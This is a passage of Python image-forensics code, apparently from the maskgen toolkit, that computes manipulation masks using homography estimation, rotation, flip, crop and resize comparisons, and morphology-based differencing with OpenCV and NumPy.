:param img1:
:param img2:
:param mask1:
:param mask2:
@type img1: ImageWrapper
@type img2: ImageWrapper
:return: None if a matrix cannot be constructed, otherwise a 3x3 transform matrix
"""
arguments = dict(arguments)
homography = arguments['homography'] if arguments is not None and 'homography' in arguments else 'RANSAC-4'
if homography in ['None', 'Map']:
return None, None
elif homography in ['All'] and 'homography max matches' in arguments:
# need as many as possible
arguments.pop('homography max matches')
src_dts_pts = getMatchedSIFeatures(img1, img2, mask1=mask1, mask2=np.asarray(mask2), arguments=arguments)
if src_dts_pts is not None:
new_src_pts = src_dts_pts[0]
new_dst_pts = src_dts_pts[1]
matches = None
if homography == 'LMEDS':
M1, matches = cv2.findHomography(new_src_pts, new_dst_pts, cv2.LMEDS)
elif homography == 'All':
M1, matches = cv2.findHomography(new_src_pts, new_dst_pts)
elif homography.find('-') > 0:
try:
                RANSAC_THRESHOLD = float(homography[homography.find('-') + 1:])
except:
RANSAC_THRESHOLD = 10.0
if matches is None:
M1, matches = cv2.findHomography(new_src_pts, new_dst_pts, cv2.RANSAC, RANSAC_THRESHOLD)
matchCount = np.sum(matches)
        if float(matchCount) / len(new_src_pts) < 0.15 and matchCount < 30:
return None, None
return M1, matchCount
return None, None
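# Note (added commentary): the 'homography' argument selects the cv2.findHomography strategy:
# 'None' and 'Map' skip homography computation here, 'LMEDS' uses cv2.LMEDS, 'All' uses the default
# least-squares method, and 'RANSAC-<t>' uses cv2.RANSAC with reprojection threshold <t>.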
def applyResizeComposite(compositeMask, shape, interpolation=2):
"""
Resize the composite mask
:param compositeMask:
:param transform_matrix:
:return:
"""
newMask = np.zeros(shape).astype('uint8')
for level in list(np.unique(compositeMask)):
if level == 0:
continue
levelMask = np.zeros(compositeMask.shape).astype('uint16')
levelMask[compositeMask == level] = 1024
newLevelMask = cv2.resize(levelMask, (shape[1], shape[0]),interpolation=interpolation)
newMask[newLevelMask > 300] = level
return newMask
class Flipper:
def __init__(self, mask, flip):
self.mask = mask
self.flipdirection = flip
self.region = boundingRegion(mask)
def _lcs(self, alist, blist):
"""
:param alist
:param blist:
:return:
"""
m = len(alist)
n = len(blist)
counter = [[0] * (n + 1) for x in range(m + 1)]
longest = 0
lcs_set = (0, 0)
for i in range(m):
for j in range(n):
if alist[i] == blist[j]:
c = counter[i][j] + 1
counter[i + 1][j + 1] = c
if c > longest:
lcs_set = (i, j)
longest = c
return lcs_set, longest
def flip(self, compositeMask):
flipped = compositeMask[self.region[0][1]:self.region[1][1], self.region[0][0]:self.region[1][0]]
flipped = cv2.flip(flipped,
1 if self.flipdirection == 'horizontal' else (-1 if self.flipdirection == 'both' else 0))
flipCompositeMask = np.zeros(self.mask.shape).astype('uint8')
flipCompositeMask[self.region[0][1]:self.region[1][1], self.region[0][0]:self.region[1][0]] = flipped
return flipCompositeMask
def applyFlipComposite(compositeMask, mask, flip):
"""
    Since SIFT cannot handle flips, flip the selected area directly.
:param compositeMask:
:param mask:
:param flip:
:return:
"""
maskInverted = ImageWrapper(np.asarray(mask)).invert().to_array()
flipper = Flipper(maskInverted, flip)
maskAltered = np.copy(mask)
maskAltered[maskAltered > 0] = 1
def work(levelMask):
flipCompositeMask = flipper.flip(levelMask)
return (flipCompositeMask + levelMask * maskAltered).astype('uint8')
return applyToComposite(compositeMask,work)
def applyToComposite(compositeMask, func, shape=None):
"""
    Loop through each level and apply the function.
    Need to convert levels to 0 and unmapped levels to 255
    :param compositeMask:
    :param func:
    :param shape:
:return:
"""
newMask = np.zeros(shape if shape is not None else compositeMask.shape).astype('uint8')
for level in list(np.unique(compositeMask)):
if level == 0:
continue
levelMask = np.zeros(compositeMask.shape).astype('uint8')
levelMask[compositeMask == level] = 255
newLevelMask = func(levelMask)
if newLevelMask is not None:
newMask[newLevelMask > 100] = level
return newMask
def applyGridTransformCompositeImage(compositeMask, startIm, destIm, edgeMask=None, arguments={}):
newMask = np.zeros((destIm.image_array.shape[0], destIm.image_array.shape[1]), dtype=np.uint8)
arguments = dict(arguments)
if 'homography max matches' in arguments:
arguments.pop('homography max matches')
levels = list(np.unique(compositeMask))
for level in levels:
if level == 0:
continue
levelMask = np.zeros(compositeMask.shape).astype('uint16')
levelMask[compositeMask == level] = 255
newlevelmask = __grid(startIm, destIm, levelMask, edgeMask=255 - edgeMask, arguments=arguments)
if newlevelmask is not None:
newMask[newlevelmask > 100] = level
return newMask
def applyInterpolateToCompositeImage(compositeMask, startIm, destIm, edgeMask, inverse=False, arguments={},
defaultTransform=None,
withMask = False):
"""
    Loop through each level and apply SIFT to transform the mask
    :param compositeMask:
    :param startIm:
    :param destIm:
    :param edgeMask:
:return:
@type destIm: ImageWrapper
@type startIm: ImageWrapper
"""
newMask = np.zeros((destIm.image_array.shape[0], destIm.image_array.shape[1]), dtype=np.uint8)
if 'homography' in arguments and arguments['homography'] == 'Map':
return applyGridTransformCompositeImage(compositeMask,
startIm,
destIm,
edgeMask=edgeMask,
arguments=arguments)
if 'homography' in arguments and arguments['homography'] == 'None':
return compositeMask
levels = list(np.unique(compositeMask))
flags = cv2.WARP_INVERSE_MAP if inverse else cv2.INTER_LINEAR
borderValue = 0
for level in levels:
if level == 0:
continue
if defaultTransform is None or (
'composite homography' in arguments and arguments['composite homography'] == 'Multiple'):
levelMask = np.zeros(compositeMask.shape).astype('uint8')
levelMask[compositeMask == level] = 200
TM, matchCountResult = __sift(startIm, destIm, mask1=levelMask, mask2=invertMask(ImageWrapper(edgeMask)), arguments=arguments)
else:
TM = defaultTransform
levelMask = np.zeros(compositeMask.shape).astype('uint16')
levelMask[compositeMask == level] = 8000
if TM is None:
newLevelMask = cv2.resize(levelMask, (destIm.size[0], destIm.size[1]))
elif withMask:
newLevelMask = applyTransform(levelMask,
mask=edgeMask,
transform_matrix=TM,
invert=inverse,
shape=(destIm.size[1], destIm.size[0]))
else:
newLevelMask = cv2.warpPerspective(levelMask, TM, (destIm.size[0], destIm.size[1]),
flags=flags,
borderMode=cv2.BORDER_CONSTANT, borderValue=borderValue)
if newLevelMask is not None:
newMask[newLevelMask > 100] = level
return newMask
def applyRotateToCompositeImage(img, angle, pivot):
"""
    Loop through each level and apply the rotation.
    Each level is expanded to a 0/255 mask before rotating.
:param img:
:param angle:
:param pivot:
:return:
"""
from functools import partial
func = partial(rotateImage, angle, pivot)
return applyToComposite(img, func, shape=img.shape)
def applyTransformToComposite(compositeMask, mask, transform_matrix, shape=None, returnRaw=False):
"""
    Loop through each level and apply the transform.
    Each level is expanded to a 0/255 mask before transforming.
:param compositeMask:
:param mask:
:param transform_matrix:
:return:
"""
from functools import partial
func = partial(applyTransform, mask=mask, transform_matrix=transform_matrix, shape=shape, returnRaw=returnRaw)
return applyToComposite(compositeMask, func, shape=shape)
def applyPerspectiveToComposite(compositeMask, transform_matrix, shape):
def perspectiveChange(composite_mask, M=None, shape=None):
return cv2.warpPerspective(composite_mask, M, (shape[1], shape[0]))
from functools import partial
func = partial(perspectiveChange, M=transform_matrix, shape=shape)
return applyToComposite(compositeMask, func, shape=shape)
def applyAffineToComposite(compositeMask, transform_matrix, shape):
def perspectiveChange(composite_mask, M=None, shape=None):
return cv2.warpAffine(composite_mask, M, (shape[1], shape[0]))
from functools import partial
func = partial(perspectiveChange, M=transform_matrix, shape=shape)
return applyToComposite(compositeMask, func, shape=shape)
def applyRotateToComposite(rotation, compositeMask, edgeMask, expectedDims, local=False):
"""
    Loop through each level and apply the rotation.
    Each level is expanded to a 0/255 mask before rotating.
    :param rotation:
    :param compositeMask:
    :param edgeMask:
    :param expectedDims:
    :param local:
:return:
"""
from functools import partial
if local:
func = partial(__localrotateImage, rotation, edgeMask, expectedDims=expectedDims, cval=255)
else:
func = partial(__rotateImage, rotation, expectedDims=expectedDims, cval=255)
return applyToComposite(compositeMask, func, shape=expectedDims)
def isHomographyOk(transform_matrix, h, w):
    # convert corners to homogeneous coordinates
ll = np.array([0, 0, 1])
ul = np.array([0, w, 1])
lr = np.array([h, 0, 1])
ur = np.array([h, w, 1])
if transform_matrix.shape == (2,3):
transform_matrix = np.vstack([transform_matrix,[0,0,1.0]])
a_ll = np.matmul(transform_matrix, ll)
a_ul = np.matmul(transform_matrix, ul)
a_ur = np.matmul(transform_matrix, ur)
a_lr = np.matmul(transform_matrix, lr)
# convert points to lines
a = np.cross(a_ll, a_ul)
b = np.cross(a_lr, a_ur)
# find point of intersection
intersection_point_projective = np.cross(a, b)
if intersection_point_projective[2] == 0:
return False
y_vertical = intersection_point_projective[0] / intersection_point_projective[2]
x_vertical = intersection_point_projective[1] / intersection_point_projective[2]
a = np.cross(a_ul, a_ur)
b = np.cross(a_ll, a_lr)
# find point of intersection
intersection_point_projective = np.cross(a, b)
if intersection_point_projective[2] == 0:
return False
y_horizontal = intersection_point_projective[0] / intersection_point_projective[2]
x_horizontal = intersection_point_projective[1] / intersection_point_projective[2]
# if the resulting lines intersect inside the box, fail
return not (0 <= x_vertical <= w and 0 <= y_vertical <= h) and not (
0 <= x_horizontal <= w and 0 <= y_horizontal <= h)
    # Alternatively, it may be more appropriate to look at the convex hull of the shape:
# point = Point(x,y)
# points = [(d[0] / d[2], d[1] / d[2]) for d in [a_ll,a_ul,a_ur,a_lr]]
##polygon = Polygon(points).convex_hull
# return not polygon.contains(point)
def applyTransform(compositeMask, mask=None, transform_matrix=None, invert=False, returnRaw=False, shape=None):
"""
    Create a new mask by applying the transform to only those parts of the
    compositeMask that overlap the provided mask.
:param compositeMask:
:param mask: 255 for unmanipulated pixels
:param transform_matrix:
:param invert:
    :param returnRaw: if True, return the transformed mask without merging it back into the composite
:return:
"""
flags = cv2.WARP_INVERSE_MAP if invert else cv2.INTER_LINEAR # +cv2.CV_WARP_FILL_OUTLIERS
maskInverted = ImageWrapper(np.asarray(mask)).invert().to_array()
maskInverted[maskInverted > 0] = 1
compositeMaskFlipped = compositeMask
# resize only occurs by user error.
if compositeMaskFlipped.shape != maskInverted.shape:
compositeMaskFlipped = cv2.resize(compositeMaskFlipped, (maskInverted.shape[1], maskInverted.shape[0]))
compositeMask = cv2.resize(compositeMask, (maskInverted.shape[1], maskInverted.shape[0]))
if shape is None:
shape = mask.shape
# zeros out areas outside the mask
compositeMaskAltered = compositeMaskFlipped * maskInverted
maxvalue = compositeMaskAltered.max()
compositeMaskAltered[compositeMaskAltered > 0] = maxvalue-20
if transform_matrix.shape[0] == 2:
newMask = cv2.warpAffine(compositeMaskAltered, transform_matrix, (shape[1], shape[0]), flags=flags,
borderMode=cv2.BORDER_CONSTANT, borderValue=0)
else:
newMask = cv2.warpPerspective(compositeMaskAltered, transform_matrix, (shape[1], shape[0]), flags=flags,
borderMode=cv2.BORDER_CONSTANT, borderValue=0)
newMask[newMask > 99] = maxvalue
newMask[newMask < 100] = 0
# put the areas outside the mask back into the composite
maskAltered = np.copy(mask)
maskAltered[maskAltered > 0] = 1
if returnRaw:
return newMask
newMask = newMask | compositeMask * maskAltered
return newMask
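# --- Illustrative usage sketch (hypothetical example; values and helper names are arbitrary) ---
# A hedged sketch of applyTransform: shift the masked region of a composite by a
# 2x3 affine translation.  The 10-pixel shift is a made-up value.
def _example_applyTransform():
    import numpy as np
    composite = np.zeros((64, 64), dtype='uint8')
    composite[10:20, 10:20] = 5  # level 5 region
    edge_mask = np.full((64, 64), 255, dtype='uint8')
    edge_mask[10:20, 10:20] = 0  # 0 marks the manipulated pixels
    shift = np.array([[1.0, 0.0, 10.0],
                      [0.0, 1.0, 10.0]])  # translate +10,+10
    # returns the composite with the level 5 region moved 10 pixels right and down
    return applyTransform(composite, mask=edge_mask, transform_matrix=shift)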
def cropResize(img,location, wh):
img_crop = img[location[0]:wh[0],location[1]:wh[1],:]
return cv2.resize(img_crop, (img.shape[1],img.shape[0]))
def cropResizeCompare(img1, img2, arguments=dict()):
width_and_height = (int(arguments['crop width']), int(arguments['crop height']))
pre_resize_img = cv2.resize(img2, width_and_height)
return composeCropImageMask(img1, pre_resize_img, location=None)
def cropCompare(img1, img2, arguments=dict()):
from maskgen.image_wrap import ImageWrapper
if (sum(img1.shape) > sum(img2.shape)):
img1_m, img2_m = __alignChannels(ImageWrapper(img1), ImageWrapper(img2))
analysis = {'shape change': sizeDiff(ImageWrapper(img1_m), ImageWrapper(img2_m))}
location = getValue(arguments,'location',None)
if type(location) == str:
location = toIntTuple(location)
mask, analysis_d = composeCropImageMask(img1_m, img2_m,location=location)
        analysis.update(analysis_d)
        return mask, analysis
return None, {}
def _composeLCS(img1, img2):
from scipy import sparse
m = img1.shape[0] * img1.shape[1]
n = img2.shape[0] * img2.shape[1]
LCS = sparse.lil_matrix((m + 1, n + 1), dtype=np.int8)
    # LCS[i][j] holds the length of the LCS of X[0..i-1] and Y[0..j-1]
for i in xrange(1, m + 1, 1):
for j in xrange(1, n + 1, 1):
x1 = (i - 1) % img1.shape[0]
y1 = (i - 1) / img1.shape[0]
x2 = (j - 1) % img2.shape[0]
y2 = (j - 1) / img2.shape[0]
if img1[x1, y1] == img2[x2, y2]:
LCS[i, j] = LCS[i - 1, j - 1] + 1
            else:
                # use a separate name so the outer dimension 'm' is not clobbered
                best = max(LCS[i - 1, j], LCS[i, j - 1])
                if best > 0:
                    LCS[i, j] = best
# Start from the right-most-bottom-most corner and
# one by one store characters in lcs[]
i = m - 1
j = n - 1
mask = np.zeros(img1.shape, dtype=np.uint8)
while i >= 0 and j >= 0:
x1 = i % img1.shape[0]
y1 = i / img1.shape[0]
x2 = j % img2.shape[0]
y2 = j / img2.shape[0]
if img1[x1, y1] == img2[x2, y2]:
mask[x1, y1] = 255
i -= 1
j -= 1
# If not same, then find the larger of two and
# go in the direction of larger value
        elif LCS[i - 1, j] > LCS[i, j - 1]:
            i -= 1
        else:
            j -= 1
    return mask
def __search1(pixel, img2, tally, endx, endy, x, y):
from collections import deque
def __addToQueue(x, y, endx, endy, queue):
if x > endx:
queue.append((x - 1, y))
if y > endy:
queue.append((x, y - 1))
if x > endx:
queue.append((x - 1, y - 1))
pixel2 = img2[x, y]
if pixel == pixel2:
return (x, y)
queue = deque()
__addToQueue(x, y, endx, endy, queue)
while len(queue) > 0:
x, y = queue.popleft()
pixel2 = img2[x, y]
if pixel == pixel2:
return x, y
if tally[x, y] == 0:
__addToQueue(x, y, endx, endy, queue)
return None
def __search(pixel, img2, tally, position, depth):
startx = min(max(0, position[0] - depth[0]), img2.shape[0])
starty = min(max(0, position[1] - depth[1]), img2.shape[1])
endx = min(position[0] + depth[0], img2.shape[0]) + 1
endy = min(position[1] + depth[1], img2.shape[1]) + 1
imgbox = img2[startx:endx, starty:endy]
image_positions = zip(*np.where(imgbox == pixel))
if len(image_positions) > 0:
tallybox = tally[startx:endx, starty:endy]
tallypostions = zip(*np.where(tallybox > 0))
if len(tallypostions) > 0:
maxtally = max(tallypostions)
image_positions = [p for p in image_positions if p > maxtally]
else:
return None
if len(image_positions) > 0:
best = min(image_positions)
return startx + best[0], starty + best[1]
return None
def _tallySeam(img1, img2, minDepth=50):
tally1 = np.zeros(img1.shape)
tally2 = np.zeros(img2.shape)
depth_x = max(img2.shape[0] - img1.shape[0], minDepth)
depth_y = max(img2.shape[1] - img1.shape[1], minDepth)
for x1 in range(img1.shape[0]):
for y1 in range(img1.shape[1]):
pos = __search(img1[x1, y1], img2, tally2, (x1, y1), (depth_x, depth_y))
if pos is not None:
tally1[x1, y1] = 1
tally2[pos[0], pos[1]] = 1
return tally1.astype('uint8') * 255
def rotateCompare(img1, img2, arguments=dict()):
rotation = float(arguments['rotation']) if 'rotation' in arguments else 0.0
local = (arguments['local'] == 'yes') if 'local' in arguments else False
if img1.shape == img2.shape:
mask1, analysis1 = __diffMask(img1, img2, False, args=arguments)
if abs(rotation) < 0.0001:
return mask1, analysis1
mask2, analysis2 = __compareRotatedImage(rotation, img1, img2, arguments)
diff = sumMask(mask1) - sumMask(mask2)
return (mask1, analysis1) if diff < 0 or local else (mask2, analysis2)
else:
return __compareRotatedImage(rotation, img1, img2, arguments)
def resizeImage(img1, shape, interpolation):
name_map = {
'bicubic': cv2api.cv2api_delegate.inter_cubic,
'nearest': cv2api.cv2api_delegate.inter_nn,
'bilinear': cv2api.cv2api_delegate.inter_linear,
'cubic': cv2api.cv2api_delegate.inter_cubic,
'mesh': cv2api.cv2api_delegate.inter_area,
'lanczos': cv2api.cv2api_delegate.inter_lanczos
}
inter_val = name_map[interpolation] if interpolation in name_map else cv2api.cv2api_delegate.inter_nn
return cv2.resize(img1, (shape[1], shape[0]), interpolation=inter_val)
def resizeCompare(img1, img2, arguments=dict()):
new_img2 = resizeImage(img2,
img1.shape,
arguments['interpolation'] if 'interpolation' in arguments else 'nearest')
return __diffMask(img1, new_img2, False, args=arguments)
def moving_average(a, n=3):
ret = np.cumsum(a, dtype=float)
ret[n:] = ret[n:] - ret[:-n]
return ret[n - 1:] / n
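# --- Illustrative usage sketch (hypothetical example; values are arbitrary) ---
# A tiny sketch of moving_average on a short sequence.
def _example_moving_average():
    import numpy as np
    return moving_average(np.array([1.0, 2.0, 3.0, 4.0, 5.0]), n=3)  # -> array([2., 3., 4.])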
def morphologyCompare(img_one, img_two, arguments= {}):
kernel_size = int(getValue(arguments, 'kernel', 3))
kernel = np.ones((kernel_size, kernel_size), np.uint8)
diff = (np.abs(img_one - img_two)).astype('uint16')
mask = np.sum(diff, 2)
difference = float(arguments['tolerance']) if arguments is not None and 'tolerance' in arguments else 0.00390625
difference = difference * 256
mask[np.where(mask < difference)] = 0
if getValue(arguments, 'distribute_difference', False):
mask = 255*mask.astype(np.double)/(np.max(mask)-difference)
mask = mask.astype('uint8')
else:
# set to black if less than threshold
mask[np.where(mask > 0)] = 255
mask = mask.astype('uint8')
mask = cv2.morphologyEx(mask,cv2.MORPH_OPEN, kernel)
mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)# filter out noise in the mask
return mask, {}
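# --- Illustrative usage sketch (hypothetical example; values are arbitrary) ---
# A hedged sketch of morphologyCompare on toy 3-channel arrays; the localized
# change and the int16 arrays are illustrative choices, not requirements.
def _example_morphologyCompare():
    import numpy as np
    a = np.zeros((32, 32, 3), dtype='int16')
    b = np.copy(a)
    b[8:16, 8:16, :] = 200  # introduce a localized change
    mask, _ = morphologyCompare(a, b)
    # mask is 255 where the summed per-channel difference exceeds the tolerance
    return mask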
def mediatedCompare(img_one, img_two, arguments={}):
morphologyOps = {'open':cv2.MORPH_OPEN, 'close':cv2.MORPH_CLOSE}
morphology_order = getValue(arguments, 'morphology order', 'open:close').split(':')
gain = int(getValue(arguments, 'gain', 0))
kernel_size=int(getValue(arguments, 'kernel',3))
weight = int(getValue(arguments, 'weight', 1.0))
smoothing = int(getValue(arguments, 'smoothing', 3))
algorithm = getValue(arguments, 'filling', 'morphology')
aggregate = getValue(arguments, 'aggregate', 'max')
kernel = np.ones((kernel_size, kernel_size), np.uint8)
max_threshold = int(getValue(arguments, 'maximum threshold', 255))
from scipy import signal
# compute diff in 3 colors
if aggregate == 'luminance':
min_threshold = int(getValue(arguments, 'minimum threshold', 3))
img_one = cv2.cvtColor(img_one.astype('uint8'), cv2.COLOR_BGR2YCR_CB)
img_two = cv2.cvtColor(img_two.astype('uint8'), cv2.COLOR_BGR2YCR_CB)
diff = (np.abs(img_one.astype('int16') - img_two.astype('int16')))
mask = diff[:, :, 0] + (diff[:, :, 2] + diff[:, :, 1])/weight
bins = 256 + 512/weight
else:
min_threshold = int(getValue(arguments, 'minimum threshold', 0))
diff = (np.abs(img_one.astype('int16') - img_two.astype('int16'))).astype('uint16')
if aggregate == 'max':
mask = np.max(diff, 2) # use the biggest difference of the 3 colors
bins=256
elif aggregate == 'sum':
mask = np.sum(diff, 2)
bins=768
else:
mask = np.mean(diff, 2)
bins = 256
hist, bin_edges = np.histogram(mask, bins=bins, density=False)
if smoothing > 0:
hist = moving_average(hist,n=smoothing) # smooth out the histogram
minima = signal.argrelmin(hist, order=1) # find local minima
size = minima[0].size
minima = minima[0][0] if size > 0 else 0
else:
size = 0
minima = min_threshold
if size == 0 or minima > bins/2: # if there was no minima, hardcode
threshold = min_threshold
else:
threshold = max(min_threshold,min(minima, max_threshold)) # Use first minima
threshold += gain
mask[np.where(mask <= threshold)] = 0 # set to black if less than threshold
mask[np.where(mask > 0)] = 255
mask = mask.astype('uint8')
if algorithm == 'morphology':
mask = cv2.morphologyEx(mask, morphologyOps[morphology_order[0]], kernel)
mask = cv2.morphologyEx(mask, morphologyOps[morphology_order[1]], kernel)
elif algorithm == 'median':
mask = cv2.medianBlur(mask, kernel_size) # filter out noise in the mask
return mask, {'threshold': threshold, 'hist': hist, 'diff':diff}
def getExifDimensionsFromData(exif_meta, crop=False):
heights = ['Cropped Image Height', 'AF Image Height', 'Image Height', 'Exif Image Height', ] if crop else [
'Image Height', 'Exif Image Height']
widths = ['Cropped Image Width', 'AF Image Width', 'Image Width', 'Exif Image Width', ] if crop else ['Image Width',
'Exif Image Width']
height_selections = [(exif_meta[h] if h in exif_meta else None) for h in heights]
width_selections = [(exif_meta[w] if w in exif_meta else None) for w in widths]
if 'png:IHDR.width,height' in exif_meta:
try:
w, h = [int(x.strip()) for x in exif_meta['png:IHDR.width,height'].split(',')]
height_selections.append(h)
width_selections.append(w)
except:
pass
return [(int(height_selections[p]), int(width_selections[p]))
for p in range(len(width_selections)) if
height_selections[p] is not None and width_selections[p] is not None]
def getExifDimensions(filename, crop=False):
from maskgen import exif
return getExifDimensionsFromData(exif.getexif(filename))
def convertCompare(img1, img2, arguments=dict()):
analysis = {}
if 'Image Rotated' in arguments and arguments['Image Rotated'] == 'yes':
if 'source filename' in arguments:
            orientation = exif.getOrientationFromExif((arguments['source filename']))
            analysis.update(exif.rotateAnalysis(orientation))
            img1 = exif.rotateAccordingToExif(img1, orientation, counter=True)
else:
# assumes crop, but this approach should be improved to use HOG comparisons
# since some of these conversions occur with Raw images
rotation, mask = __findRotation(img1, img2, [0, 90, 180, 270])
analysis.update({'rotation': rotation})
return 255 - mask, analysis
if 'source filename' in arguments and img1.shape != img2.shape:
# see if there is crop information in exif
dims_crop = getExifDimensions(arguments['source filename'], crop=True)
dims = getExifDimensions(arguments['source filename'], crop=False)
if len(dims_crop) > 0 and len(dims) > 0 and dims_crop[0] != dims[0]:
analysis['Crop'] = 'yes'
if img1.shape != img2.shape:
diff_shape = (int(img1.shape[0] - img2.shape[0]) / 2, int(img1.shape[1] - img2.shape[1]) / 2)
#keep in mind that alterMask, used for composite generation, assumes 'crop' occurs first, followed
# by final adjustments for size
if 'location' not in arguments:
diff_shape= (max(1,diff_shape[0]),max(1,diff_shape[1]))
else:
diff_shape = toIntTuple(arguments['location'])
if getValue(arguments, 'Crop','yes') == 'no':
new_img1 = img1
else:
new_img1 = img1[diff_shape[0]:-diff_shape[0], diff_shape[1]:-diff_shape[1]]
new_img2 = cv2.resize(img2, (new_img1.shape[1], new_img1.shape[0]))
if getValue(arguments, 'Crop', 'yes') == 'yes':
analysis['location'] = str(diff_shape)
mask, a = __diffMask(new_img1, new_img2, False, args=arguments)
else:
mask, a = __diffMask(img1, img2, False, args=arguments)
analysis.update(a)
return mask, analysis
def __composeMask(img1_wrapper, img2_wrapper, invert, arguments=dict(), alternativeFunction=None, convertFunction=None):
"""
:param img1:
:param img2:
:param invert:
:param arguments:
:param alternativeFunction:
:param convertFunction:
:return:
@type img1_wrapper: ImageWrapper
@type img2_wrapper: ImageWrapper
@type arguments: dict
@rtype numpy.ndarray,dict
"""
img1, img2 = __alignChannels(img1_wrapper,
img2_wrapper,
convertFunction=convertFunction)
args = {}
args.update(arguments)
args['source filename'] = img1_wrapper.filename
args['target filename'] = img2_wrapper.filename
if alternativeFunction is not None:
try:
mask, analysis = alternativeFunction(img1, img2, arguments=args)
removeValue(analysis, 'arguments.source filename')
removeValue(analysis, 'arguments.target filename')
if mask is not None:
return mask if not invert else 255 - mask, analysis, None
except ValueError as e:
logging.getLogger('maskgen').error('Mask generation failure ' + str(e))
logging.getLogger('maskgen').info('Arguments ' + str(arguments))
mask = np.zeros(img1.shape, dtype=np.uint8)
analysis = {}
return abs(255 - mask).astype('uint8') if invert else mask, analysis, str(e)
# rotate image two if possible to compare back to image one.
# The mask is not perfect.
mask = None
error = None
rotation = float(arguments['rotation']) if 'rotation' in arguments else 0.0
analysis = {}
if abs(rotation) > 0.0001:
mask, analysis = __compareRotatedImage(rotation, img1, img2, arguments)
if sum(img1.shape) > sum(img2.shape):
mask, analysis = composeCropImageMask(img1, img2)
if sum(img1.shape) < sum(img2.shape):
mask, analysis = __composeExpandImageMask(img1, img2)
if mask is None:
try:
if img1.shape != img2.shape and \
img1.shape[1] == img2.shape[0] and \
img1.shape[0] == img2.shape[1]:
arguments['Image Rotated'] = 'yes'
mask, analysis = convertCompare(img1, img2, arguments)
else:
mask, analysis = __diffMask(img1, img2, False, args=arguments)
except Exception as e:
logging.getLogger('maskgen').error('Mask generation failure ' + str(e))
logging.getLogger('maskgen').info('Arguments ' + str(arguments))
mask = np.zeros(img1.shape, dtype=np.uint8)
analysis = {}
return abs(255 - mask).astype('uint8') if invert else mask, analysis, error
def __alignShape(im, shape):
x = min(shape[0], im.shape[0])
y = min(shape[1], im.shape[1])
z = np.zeros(shape)
for d in range(min(shape[2], im.shape[2])):
z[0:x, 0:y, d] = im[0:x, 0:y, d]
return z
def __resize(img, dimensions):
if img.shape[0] != dimensions[0]:
diff = abs(img.shape[0] - dimensions[0])
img = np.concatenate((np.zeros((diff / 2, img.shape[1])), img), axis=0)
img = np.concatenate((img, np.zeros((diff - (diff / 2), img.shape[1]))), axis=0)
if img.shape[1] != dimensions[1]:
diff = abs(img.shape[1] - dimensions[1])
img = np.concatenate((np.zeros((img.shape[0], diff / 2)), img), axis=1)
img = np.concatenate((img, np.zeros((img.shape[0], diff - (diff / 2)))), axis=1)
return img
def rotateImage(angle, pivot, img):
padX = [img.shape[1] - pivot[1], pivot[1]]
padY = [img.shape[0] - pivot[0], pivot[0]]
imgP = np.pad(img, [padY, padX], 'constant')
if abs(angle) % 90 == 0:
imgR = np.rot90(imgP, int(angle / 90)).astype('uint8')
else:
try:
imgR = np.asarray(Image.fromarray(imgP).rotate(angle))
except:
imgR = ndimage.rotate(imgP, angle, cval=0, reshape=False, mode='constant').astype('uint8')
return imgR[padY[0]: -padY[1], padX[0]: -padX[1]]
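# --- Illustrative usage sketch (hypothetical example; values are arbitrary) ---
# A small sketch of rotateImage: rotate a mask 90 degrees about a pivot given as (row, col).
def _example_rotateImage():
    import numpy as np
    img = np.zeros((8, 8), dtype='uint8')
    img[1, 1] = 255  # a single marked pixel
    return rotateImage(90, (4, 4), img)  # 90-degree multiples use np.rot90 internally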
def __localrotateImage(rotation, mask, img, expectedDims=None, cval=0):
maskInverted = ImageWrapper(np.asarray(mask)).invert().to_array()
maskInverted[maskInverted > 0] = 1
targetDims = img.shape
if expectedDims is not None:
targetDims = expectedDims
x0,y0,w,h = widthandheight(maskInverted)
if w == 0 or h == 0:
return img
h = min(h+1, targetDims[0])
w = min(w+1, targetDims[1])
subImg = img[y0:(y0+h),x0:(x0+w)]
center = (h /2, w / 2)
M = cv2.getRotationMatrix2D(center, rotation, 1.0)
rotatedSubMask = cv2.warpAffine(subImg*maskInverted[y0:(y0+h),x0:(x0+w)], M, (w,h),flags=cv2api.cv2api_delegate.inter_linear)
rotatedMask = np.zeros(mask.shape)
rotatedMask[y0:y0+h,x0:x0+w] = rotatedSubMask
maskAltered = np.copy(mask)
maskAltered[maskAltered > 0] = 1
return (rotatedMask + img * maskAltered).astype('uint8')
def __rotateImage(rotation, img, expectedDims=None, cval=0):
expectedDims = expectedDims if expectedDims is not None else (img.shape[0], img.shape[1])
rotNorm = int(rotation / 90) if (rotation % 90) == 0 else None
rotNorm = rotNorm if rotNorm is None or rotNorm >= 0 else (4 + rotNorm)
npRotation = rotNorm is not None and img.shape == (expectedDims[1], expectedDims[0])
if npRotation:
res = np.rot90(img, rotNorm)
else:
res = ndimage.interpolation.rotate(img, rotation, cval=cval, reshape=(img.shape != expectedDims), order=0)
if (res.shape[0],res.shape[1]) != expectedDims:
res = cv2.resize(res,(expectedDims[1],expectedDims[0]))
return res
def __compareRotatedImage(rotation, img1, img2, arguments):
if rotation != 0:
res = __rotateImage(rotation, img1, expectedDims=img2.shape, cval=img2[0, 0])
else:
res = img1
mask, analysis = __composeExpandImageMask(res, img2) if res.shape != img2.shape else __diffMask(res,
img2,
False,
args=arguments)
if rotation != 0:
res = __rotateImage(-rotation, mask, expectedDims=img1.shape, cval=255)
else:
res = mask
return res, analysis
def __findRotation(img1, img2, range):
best = 0
r = None
best_mask = None
for rotation in range:
res, analysis = __compareRotatedImage(rotation, img1, img2, {})
c = np.sum(res)
if c > best or best_mask is None:
best = c
best_mask = res
r = rotation
return r, best_mask
# res = __resize(mask,(max(img2.shape[0],img1.shape[0]), max(img2.shape[1],img1.shape[1])))
# res[res<0.00001] = 0
# res[res>0] = 255
# # now crop out the rotation difference, to make sure the original image is not modified
# if img1.shape != res.shape:
# diff = (res.shape[0]-img1.shape[0], res.shape[1]-img1.shape[1])
# diff = (diff[0] if diff[0] > 0 else 0, diff[1] if diff[1] > 0 else 0)
# res = res[diff[0]/2:res.shape[0]-((diff[0]/2) -diff[0]),diff[1]/2:res.shape[1]-((diff[1]/2) - diff[1])]
def extractAlpha(rawimg1, rawimg2):
"""
    If rawimg2 has an alpha channel, use it: pixels with a high alpha value are the pixels that did not change.
:param rawimg1:
:param rawimg2:
:return:
"""
img2_array = rawimg2.to_array()
img1_array = rawimg1.to_array()
ii16 = np.iinfo(np.uint16)
if len(img2_array.shape) == 3 and img2_array.shape[2] == 4:
img2_array = img2_array[:, :, 3]
if len(img2_array.shape) == 2:
